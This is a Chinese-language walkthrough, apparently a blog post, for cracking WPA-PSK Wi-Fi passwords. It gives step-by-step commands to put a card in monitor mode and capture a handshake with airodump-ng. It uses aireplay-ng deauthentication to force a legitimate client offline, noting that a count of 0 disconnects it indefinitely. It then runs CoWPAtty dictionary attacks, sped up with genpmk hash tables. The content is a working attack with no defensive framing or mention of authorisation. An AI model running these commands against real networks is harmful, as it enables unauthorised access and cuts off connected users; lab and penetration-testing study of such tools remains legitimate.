WPA破解-创建Hash-table加速并用Cowpatty破解
WPA破解-创建Hash-table加速并用Cowpatty破解
1.Cowpatty 软件介绍
CoWPAtty是WPA-PSK的自动字典攻击工具,它运行在Linux上,该程序具有命令行界面,并使用字典进行密码攻击。
2.渗透流程
1.安装CoWPAtty
cowpatty
如果出现如下报错:
请输入
apt install binutils
即可
2.抓握手包
1.查看网卡
ip a
2.开启监听模式
airmon-ng start wlan0
3.扫描wifi
airodump-ng wlan0mon
4.抓握手包
airodump-ng wlan0mon -c 1 --bssid 10:BD:18:08:43:31 -w wpa-1
-c:指定信道
--bssid:AP的MAC地址
-w:保存抓包结果
5.进行冲突模式攻击
aireplay-ng -0 5 -a 10:BD:18:08:43:31 -c 68:54:5A:85:CB:40 wlan0mon
-0:冲突攻击模式,后面跟发送次数(设置为 0,则为循环攻击,不停的断开连接,客户端无法正常上网)
-a:设置 ap 的 mac
-c:设置已连接的合法客户端的 mac
3.STA重新连接wifi
成功抓到握手包
4.渗透WPA wifi
cowpatty -f passwd.txt -r wpa-1-01.cap -s cisco-432F
-f:字典文件
-r:数据包捕获文件
-s:网络SSID(如果SSID包含空格,则使用引号括起来)
密码出来了
5.使用大字典破解
cowpatty -f pwd.txt -r wpa-1-01.cap -s cisco-432F
可以看到没有加速的情况下,用大字典去跑非常的慢
3.hash-table加速
1.将密码字典生成hash-table
genpmk -f pwd.txt -d ./pwdhash -s cisco-432F
-s wifi的SSID
生成hask-table速度比较慢,一般要几小时,但是具有可传播性
2.加速渗透
cowpatty -d pwdhash -r wpa-1-01.cap -s cisco-432F
这里实际上破解密码的速度是加速前的好几十倍
加速效果对比:
400的速度和300000的速度